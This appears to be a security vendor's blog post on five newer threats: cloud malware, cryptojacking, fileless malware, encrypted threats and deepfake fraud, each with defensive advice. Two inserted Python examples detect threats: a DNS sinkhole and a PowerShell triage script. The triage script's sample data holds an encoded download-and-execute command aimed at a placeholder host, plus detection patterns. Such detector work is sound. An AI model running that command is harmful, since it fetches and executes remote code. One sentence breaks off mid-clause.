Nowadays, technology moves a mile a minute – or faster! Yet as the cyber security community are all too aware, for all of the exciting, positive advances being made, a negative, seedy undercurrent is never too far away.
Long gone are the days when a single strain of malware made the news out of sheer novelty (WannaCry’s widespread devastation being the exception here). Cyber risks are now a ubiquitous, everyday threat to organisations of all kinds, and “traditional” viruses and social engineering attacks aren’t all we have to worry about nowadays.
So, with that in mind, let’s explore 5 types and/or methods of cyberattack that would have been unthinkable 10 years ago – and would have been considered frankly sci-fi at the turn of the 21st century.
Cloud Malware
In the internet’s infancy, infecting a single, well-placed PC could be enough for a hacker, depending on their aims, of course. Then, as network and internet connectivity became faster and more ubiquitous, criminals started leaning more on malware that swept across whole networks to cause widespread devastation.
But now that the remote working – and indeed “work from anywhere” – movement is gaining momentum, an organisation’s endpoint devices may be spread across numerous networks – and even across numerous continents! So how can hackers carry out their evil ends when everyone’s so remote? By infecting their shared online resources, of course.
What is Cloud Malware?
Cloud malware is malicious software that’s designed to negatively impact and/or be distributed through cloud computing services. Cloud malware can facilitate data theft, data loss, disruption, credential bypassing/theft, eavesdropping attacks, and more.
Cloud platforms can be a potential goldmine for attackers as users generally have to trust their cloud software or storage vendors that everything is secure – the users themselves generally have little control over the actual servers and infrastructure that go into delivering that service.
Malware spread through cloud services is nothing new either. Cloud syncing and file sharing tools have been used by criminals since the mid-2010s to spread malware like Virlock. Organisations using cloud-based virtual machines can also suffer hypervisor attacks – attacks that either overload or take over the cloud hypervisor software that controls their virtual machines.
How to Avoid Cloud Malware?
Anything that secures your cloud platforms and obfuscates the data held within gives you the best possible protection against cloud malware. If possible, encrypt all of your cloud storage data, regularly backup all data housed in the cloud, and require strong user authentication on all cloud logins.
Depending on your relationship with cloud providers, you may find it valuable to open up a dialogue with them about how they are protecting users’ cloud accounts and data.
It’s also wise to enact strict “principle of least privilege” policies and segment access to sensitive data across your cloud platforms to further reduce your potential cloud-based attack surface.
Cryptojacking Malware
Love it or hate it, cryptocurrency and blockchain technology have come a long way since Bitcoin’s inception in 2009. Some early adopters became millionaires overnight – but nowadays, by and large, returns are diminishing somewhat. However, that doesn’t stop cybercriminals from creating all manner of hacks, malware, and scams around crypto.
Though criminals often exploit unsuspecting victims’ curiosity and confusion around crypto to scam them out of their money, one cyber threat in particular is growing: cryptojacking.
What is Cryptojacking?
Cryptojacking is when hackers covertly harness the computing power of a victim’s device and use it to mine cryptocurrency for themselves – without the victim knowing. This is usually achieved through cryptojacking malware.
This is not a harmless or victimless crime. A cryptojacking victim’s device often ends up consuming more power than it did before, resulting in higher energy bills. Also, a cryptojacking victim’s computing resources are drawn away from the tasks that they need to carry out.
This is bad enough for private individuals who find themselves infected, but it can be an incredibly costly problem for businesses with multiple devices under the cryptojackers’ spell. Energy consumption and computing power are being stolen from under their noses en masse, after all.
There are generally two ways that cryptojacking malware makes its way onto a victim’s device. The first is the same way that a lot of malware and persistent threats spread: through being embedded in a file, packaged in a piece of innocent-seeming software, or through clicking on an innocuous link.
The second is so-called “drive-by” cryptojacking. This is where cryptomining JavaScript code is installed on a web page, and that code runs on any device used to visit the page. This drive-by method can continue stealing computing power until long after the web page has been closed!
SonicWall’s 2023 Cyber Threat Report shows that cryptojacking attacks have risen by 43% since 2022.
How to Avoid Cryptojacking Malware?
The most effective way to stay safe from cryptojacking is to use reliable antivirus or endpoint protection software, and to keep it up to date. These solutions are generally wise to the tricks of cryptojackers and will help to prevent any malicious software or JavaScript from running.
A good firewall can also help to block known cryptojacking links from being accessed through simple DNS Sinkhole functionality. You can also install browser extensions/add-ons that prevent web-based cryptominers from running. It’s also good practice to invest in tools which monitor all of your devices’ power consumption, CPU usage, and even graphics card usage to help detect resource misuse.
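As an added worked example that is not part of the original article, this sketches the DNS sinkhole behaviour described above: a query for a blocklisted mining domain (or any subdomain of it) is answered with an internal sinkhole address instead of the real one, and each hit is recorded so the security team can see which device asked. The blocklist entries, sinkhole address, upstream resolver and log lines are all constructed placeholders.

```python
# Constructed blocklist of cryptojacking / mining-pool domains; placeholders, not real indicators.
MINING_BLOCKLIST = {"pool.cryptomine.invalid", "js-miner.invalid", "xmr-stratum.invalid"}
# Assumed internal sinkhole host: answering with it (rather than NXDOMAIN) lets you log which
# endpoints actually try to connect, which is the list of machines to go and clean.
SINKHOLE_ADDR = "10.255.255.1"

# Constructed DNS query log lines: "<time> <client_ip> <qname> <qtype>" (not real traffic).
SAMPLE_QUERIES = [
    "12:00:01 192.0.2.10 www.example.com A",
    "12:00:02 192.0.2.11 ws.pool.cryptomine.invalid A",
    "12:00:03 192.0.2.10 js-miner.invalid AAAA",
    "12:00:04 192.0.2.12 notjs-miner.invalid A",
]


def is_blocked(qname, blocklist=MINING_BLOCKLIST):
    """True if qname is a blocklisted domain or any subdomain of one.
    Matching is done on label boundaries, so 'notjs-miner.invalid' is NOT caught by 'js-miner.invalid'."""
    labels = qname.rstrip(".").lower().split(".")
    return any(".".join(labels[i:]) in blocklist for i in range(len(labels)))


def resolve(qname, upstream):
    """Answer a query: the sinkhole address for blocked names, otherwise whatever upstream says."""
    return SINKHOLE_ADDR if is_blocked(qname) else upstream(qname)


def process_log(lines, upstream):
    """Replay query log lines through the sinkhole; return (answers, hits).
    hits pairs each client with the blocked name it asked for: the alert the SOC wants to see."""
    answers, hits = [], []
    for line in lines:
        _time, client, qname, _qtype = line.split()
        answer = resolve(qname, upstream)
        answers.append(answer)
        if answer == SINKHOLE_ADDR:
            hits.append((client, qname))
    return answers, hits


def fake_upstream(qname):
    """Stand-in for a real upstream resolver (constructed; always returns one documentation address)."""
    return "198.51.100.1"
```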
Interpol has an excellent explainer about cryptojacking that is well worth a read.
Fileless Malware
Fileless malware is interesting in many ways. Its lineage traces back to viral DOS programs in the 80s and 90s, but modern strains are now thought to account for around 40% of global malware infections.
What is Fileless Malware?
Fileless malware is a type of malicious software that operates entirely from the device’s operating memory (“RAM”). It doesn’t write any files or data to the device’s drive, which means it can more easily evade antimalware controls that rely on file scans and signatures.
Fileless infections usually operate by harnessing zero-day weaknesses within known, trusted software to covertly run nefarious code. Fileless malware can make its way onto a machine in many of the same ways as regular malware – by clicking a dodgy link or opening an infected file that loads the malicious code into RAM.
Because it sits in the background, potentially undetectable to antivirus tools, fileless malware can be used to carry out
How to Avoid Fileless Malware?
Fileless malware is sneaky by design, so prevention is better than cure. Cyber awareness training can be particularly useful here, especially advice that stresses the importance of not clicking on suspicious links and not downloading files from untrusted sources.
However, training shouldn’t be your only defence. Endpoint detection and response tools like LimaCharlie provide rich endpoint usage logs that can help uncover unknown nasties. Managed detection and response tools like Huntress can connect you with a real, human threat hunter if any untoward activity is detected.
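As an added example that is not drawn from the article (nor from LimaCharlie or Huntress), the triage below shows the kind of check that endpoint process-creation logs make possible. It assumes the common PowerShell-based fileless case, where the script is base64-encoded on the command line and pulls code straight into memory; the events, pattern list and parent-process list are constructed for illustration.

```python
import base64
import re


def _enc(script):  # helper for building the sample: PowerShell expects base64 of UTF-16LE text
    return base64.b64encode(script.encode("utf-16-le")).decode()


SAMPLE_EVENTS = [  # constructed process-creation events in an EDR/Sysmon-like shape, not real telemetry
    {"host": "ws-01", "parent": "explorer.exe", "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
    {"host": "ws-02", "parent": "winword.exe", "cmdline": "powershell.exe -nop -w hidden -enc "
     + _enc("IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/x')")},
    {"host": "ws-03", "parent": "cmd.exe", "cmdline": "powershell.exe -EncodedCommand " + _enc("Write-Host 'hello'")},
]

# Strings that commonly mark code being fetched or loaded straight into memory rather than from disk.
IN_MEMORY_PATTERNS = [r"Invoke-Expression|\bIEX\b", r"DownloadString|DownloadData|Invoke-WebRequest",
                      r"\[Reflection\.Assembly\]::Load", r"FromBase64String"]
# Parents that should rarely launch a shell; a document spawning PowerShell is a classic initial foothold.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line uses -enc/-EncodedCommand (switch spellings assumed), else None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if re.fullmatch(r"-(e|ec|en|enc|encodedcommand)", tok, re.IGNORECASE):
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16-le")
            except ValueError:  # not valid base64 / UTF-16LE: treat as not encoded
                return None
    return None


def assess_event(event):
    """Return the list of indicators suggesting in-memory (fileless) execution for one event."""
    cmd = event["cmdline"]
    decoded = decode_encoded_command(cmd)
    script = decoded if decoded is not None else cmd  # inspect the real script, not its base64 wrapper
    reasons = []
    if decoded is not None:
        reasons.append("encoded command")
    if re.search(r"-w(indowstyle)?\s+hidden", cmd, re.IGNORECASE):
        reasons.append("hidden window")
    if event["parent"].lower() in OFFICE_PARENTS:
        reasons.append("spawned by " + event["parent"])
    reasons += ["in-memory pattern: " + p for p in IN_MEMORY_PATTERNS if re.search(p, script, re.IGNORECASE)]
    return reasons


def triage(events, min_indicators=2):
    """Hosts whose event trips at least min_indicators; a single indicator alone is too noisy to alert on."""
    return {e["host"]: r for e in events if len(r := assess_event(e)) >= min_indicators}
```

Encoded commands are legitimate in many environments (management tooling uses them), so the combination of indicators, not any one of them, is what makes ws-02 worth a human threat hunter's time.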
Encrypted Threats
Encryption is an important concept in cyber security. You can encrypt data both at rest and in transit to conceal its contents from prying eyes. And over the past 5 years or so, the internet has been moving towards encrypted HTTPS/TLS web traffic as standard – even for websites that don’t handle sensitive data like payment details.
All sounds good, right? Well, the benefits massively outweigh the drawbacks – but there are certainly drawbacks. Case in point: encrypted malware threats.
What are Encrypted Threats?
Encrypted threats are any kind of cyber threats that are purposefully distributed through encrypted connections like HTTPS/TLS in order to evade threat detection measures.
Though next-generation firewalls and security solutions can usually defend against encrypted cyber threats, older firewalls and security tools generally can’t. Why? Because older firewalls were developed before our encryption-first, HTTPS-driven web and are therefore more au fait with inspecting unencrypted HTTP traffic. They are unlikely to have the facilities to decrypt and inspect encrypted data, and may simply let encrypted threats through unchallenged.
Newer, next-gen tools will generally include a function called “deep packet inspection” which allows the firewall to decrypt and inspect encrypted data packets before either sending that data on its way or stopping it in its tracks.
In their 2023 Cyber Threat Report, SonicWall found that though instances of encrypted threats are down on the whole, organisations in critical fields like education, healthcare, and government still seem to be a growing target.
How to Avoid Encrypted Threats?
The best way to prevent encrypted threats is to look into whether your existing firewall can handle deep packet inspection; if it can’t, it’s probably time to upgrade to one that does. There are alternative solutions designed just to intercept and decrypt data packets to check for encrypted nasties, but a new firewall will provide you with a much wider range of up-to-date security benefits, far beyond mere defence against encrypted threats.
Our pals at Just Firewalls recommend that you upgrade your firewall every 5 years, so if your current firewall is any older, just get in touch for a no-obligation chat!
Deepfake Scams
This is arguably the cruellest and most insidious threat on this list. Despite the current wailing and gnashing of teeth over generative AI rendering all of our jobs obsolete, we feel that deepfake and voice cloning scams are perhaps the more present threat – because they’re already happening.
What is a Deepfake Scam?
A deepfake scam is where cybercriminals use AI deepfake technology to create a falsified, yet convincing video and/or audio clip of a real person in order to influence or defraud a victim.
The person being digitally impersonated could be anyone who will get the recipient to take notice: their manager, their CEO, a colleague, a celebrity, a friend, a family member. Depending on the technology used, a clip as short as 10-20 seconds of a person speaking can be used to create a convincing audio deepfake of them.
This isn’t science fiction, either. It’s old news. Back in 2019, criminals used AI software to impersonate a chief executive’s voice – down to his “slight German accent and the melody of his voice” – to deceive the CEO of a subsidiary over the phone, eventually defrauding the company out of €220,000. In a similar case from 2021, cybercriminals used a fake, AI-generated voice of a person the victim knew well to dupe a bank manager into transferring $35m.
How to Avoid Deepfake Scams?
One of the best ways of scuppering any scams that purport to be from someone you know is to “trust but verify”. Before you act on a phone call or video message that instructs you to transfer any money or data outside of your organisation through non-standard means, double check those directions with the supposed sender through another channel.
Received a phone call from your boss asking you to make a large, unexpected bank transfer? Grab them on a video call or by email to confirm what you’ve been asked to do. Received a pre-recorded video message from a colleague who asks you to create a login or a physical access pass for someone you’ve never heard of? Give them a ring and double check.
Cyber threats don’t stay still – and cyber awareness training shouldn’t either! Ensure that any cyber training you run incorporates an awareness of deepfake scams and update that training alongside technological developments like these.
But that’s not all!
We’ve seen an influx of far more than just 5 types of threats over the last decade. We’ve discussed Internet of Things, SCADA, and ICS malware at length in other articles – all enabled by our increasingly connected world and the smart tech boom.
We’re also looking at the recent developments in quantum computing with some trepidation. Will it spell the end of secure data encryption as we know it?
We suppose the next decade will tell.
If you’re concerned that your existing cyber and network controls wouldn’t stand up to the threats discussed above, just ask the experts! Request a call back from a member of our senior technical team today.